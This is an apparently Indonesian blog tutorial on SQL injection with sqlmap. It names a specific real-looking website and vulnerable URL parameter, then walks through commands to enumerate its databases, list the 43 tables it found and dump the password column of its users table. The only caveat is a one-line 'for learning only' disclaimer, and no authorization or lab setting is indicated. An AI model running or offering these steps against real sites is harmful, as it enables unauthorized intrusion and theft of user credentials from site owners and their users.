Scanning Database Web Menggunakan SQLMap



Sqlmap adalah salah satu tools yang digunakan untuk mendeteksi atau exploitasi kelemahan database pada sebuah website dengan menggunakan serangan SQL injection. 

Pengertian SQL injection

SQL injection adalah suatu teknik hacking yang digunakan pada Sqlmap dimana attacker dapat memberikan perintah-perintah SQL melalui URL untuk melihat database.

Pengertian Database

Database adalah kumpulan informasi yang disimpan dalam webserver secara sistematik yang berfungsi untuk menyimpan informasi didalam suatu basis data.

Implementasi :



  1.  Langkah pertama, carilah target web yang ingin diambil database nya. Contoh target web yang diambil : http://meggieschneider.com/ .

  2. Lalu buka terminal yang ada didalam Kali Linux untuk membuka sqlmap. Setelah terminal terbuka masukkan perintah sqlmap.



  3. Setelah sqlmap jalan, masukkan perintah sqlmap -u http//meggieschneider.com/php/detail.php?id=48 --dbs. Perintah berfungsi mencari database dari website yang ingin di inject.



  4. Setelah proses injeksi selesai, maka akan menampilkan database yang teridentifikasi. Pada proses injeksi ini terdapat 2 database, yaitu DB383432 dan information_schema. DB383432 merupakan database yang dibuat manual oleh pembuat web. Sedangkan information_schema merupakan database MySQL utama yang mengurus semua proses database.


  5. Selanjutnya masukkan perintah sqlmap -u http//meggieschneider.com/php/detail.php?id=48 -D DB383432 --table. Perintah ini berfungsi untuk melihat nama table dari database.



    Setelah proses selesai, maka akan menampilkan nama table yang ada didalam database. Seperti gambar dibawah ini menampilkan 43 tables dari database DB383432.


  6. Masukkan perintah sqlmap -u http//meggieschneider.com/php/detail.php?id=48 -D DB383432 -T users --columns. Perintah ini berfungsi untuk menampilkan isi table dari database.

    setelah proses pengambilan selesai, maka akan menampilkan isi table users di database DB383432.




  7. Setelah itu masukkan perintah sqlmap -u http//meggieschneider.com/php/detail.php?id=48 -D DB383432 -T users -C pass --dump. Perintah ini berfungsi menampilkan isi kolom dari suatu table didalam database.


    Setelah proses pengambilan kolom dari table pass, maka akan menampilkan data yang ingin dilihat dari table pass.


*Artikel ini hanya untuk pembelajaran semata dan gunakan ilmu dengan sebaik - baiknya




Comments

Post a Comment